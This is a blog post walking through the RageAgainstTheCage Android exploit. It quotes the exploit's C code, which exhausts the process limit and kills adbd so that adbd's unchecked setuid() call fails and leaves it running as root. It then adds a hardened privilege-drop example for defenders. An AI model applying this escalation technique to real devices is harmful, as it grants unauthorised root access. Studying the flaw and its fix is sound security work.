RageAgainstTheCage

This post gives a detailed explanation of the RageAgainstTheCage (RATC) exploit, also commonly known as the “adb setuid exhaustion attack” and CVE-2010-EASY ;)

getrlimit(RLIMIT_NPROC, &rl)

If a process tries to perform a fork and the user that owns that process already owns RLIMIT_NPROC processes, then the fork fails.

adb_pid = find_adb();

This function merely finds the adb daemon’s pid.

Now RATC spawns RLIMIT_NPROC stub processes:

	if (fork() == 0) {
		/* Child: keep forking until the per-user process limit is hit. */
		close(pepe[0]);
		for (;;) {
			if ((p = fork()) == 0) {
				/* Each stub exits at once; the parent never reaps it,
				 * so it keeps counting against RLIMIT_NPROC. */
				exit(0);
			} else if (p < 0) {
				/* fork() failed: the limit is reached. Notify the
				 * parent once over the pipe, then keep retrying so
				 * that any slot that frees up is reclaimed immediately. */
				if (new_pids) {
					printf("\n[+] Forked %d childs.\n", pids);
					new_pids = 0;
					write(pepe[1], &c, 1);
					close(pepe[1]);
				}
			} else {
				++pids;
			}
		}
	}

Now RATC kills the adb daemon using the pid it collected earlier:

kill(adb_pid, 9);

Note that at this point there are RLIMIT_NPROC - 1 processes active in the system under the ownership of RATC’s user.

Detecting the death of adbd, adb restarts it. When adbd is restarted, it has multiple tasks to accomplish for which it has to run as the root user; the details of those are not crystal clear to me at the moment.

Once these tasks are accomplished, it lowers its privileges to AID_SHELL by running:

        setgid(AID_SHELL);
        setuid(AID_SHELL);

RATC spawns another process at the same time:

	if (fork() == 0) {
		/* Race adbd for the last free process slot, then linger. */
		fork();
		for (;;)
			sleep(0x743C);
	}

This is a race condition between RATC and the adb-server, as to which of the two gets to spawn that last process and hit the RLIMIT_NPROC limit, thereby preventing the other from doing so.
If RATC wins the race and successfully spawns a stub process, RLIMIT_NPROC is reached, adb’s attempt to setuid(AID_SHELL) fails, and adbd continues to run as root.
The flaw here is that the return value of setuid() is not checked. All the user needs to do now is spawn a shell from adb; the parent’s privileges are inherited by the shell, which runs as root.

If adb wins the race and its setuid() succeeds, then the fork() in RATC fails, and so does the user’s attempt to gain root access. All the user can do is run the entire method again.
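The root cause the post identifies is the unchecked setgid()/setuid() pair. As an added example (not adbd’s code and not Krahmer’s), here is that pattern beside a hardened privilege drop that checks every return value and then verifies the drop actually took effect; the function names and the tiny main() are my own. One caveat worth knowing: since Linux 3.1 the RLIMIT_NPROC check was moved out of setuid() and into execve(), so this particular trigger no longer applies on current kernels, but setuid() can still fail for other reasons (EAGAIN, or EPERM from a sandbox), which is why the checked form remains the correct one.

```c
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* The pattern the post describes: return values are discarded.
 * If setuid() fails, the process silently keeps running as root. */
void drop_privileges_unchecked(uid_t uid, gid_t gid)
{
    setgid(gid);
    setuid(uid);
}

/* Hardened form (hypothetical name). Returns 0 on success, -1 with errno set
 * if any step failed or the drop did not take effect. Callers must treat -1
 * as fatal and exit rather than carry on with root privileges. */
int drop_privileges_checked(uid_t uid, gid_t gid)
{
    /* Supplementary groups can only be cleared with privilege; an
     * unprivileged caller has none it could have inherited from root here. */
    if (geteuid() == 0 && setgroups(0, NULL) != 0)
        return -1;

    /* Groups first: once the uid is dropped, changing the gid is no longer
     * permitted, so the order matters. */
    if (setgid(gid) != 0)
        return -1;
    if (setuid(uid) != 0)
        return -1;

    /* Verify the drop instead of trusting the return codes alone. */
    if (getuid() != uid || geteuid() != uid ||
        getgid() != gid || getegid() != gid) {
        errno = EPERM;
        return -1;
    }

    /* If we dropped to a non-root uid, regaining root must now be impossible
     * (this also catches a saved uid that was left at 0). */
    if (uid != 0 && setuid(0) == 0) {
        errno = EPERM;
        return -1;
    }
    return 0;
}

int main(void)
{
    /* Stand-alone demo: "drop" to our own ids, which always succeeds, and
     * show what a caller should do with a failure. */
    if (drop_privileges_checked(getuid(), getgid()) != 0) {
        fprintf(stderr, "privilege drop failed: %s\n", strerror(errno));
        return 1;
    }
    printf("running as uid %u / gid %u\n",
           (unsigned)geteuid(), (unsigned)getegid());
    return 0;
}
```

Run as an unprivileged user, drop_privileges_checked(0, 0) returns -1 because setgid(0) is refused; run as root it succeeds, and a subsequent drop to a non-root uid both succeeds and leaves setuid(0) failing with EPERM.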

This is by far the most easily understood exploit I have seen so far.
All credit to Sebastian Krahmer, The Intrepidus Group and !g.
You can check the adb.c source here.
Sebastian has published his code under the GPL.
The complete RageAgainstTheCage code

2 responses »

  1. very nice and excellent explanation of the exploit. can I repost it on my website to your credit?

    stay gold..
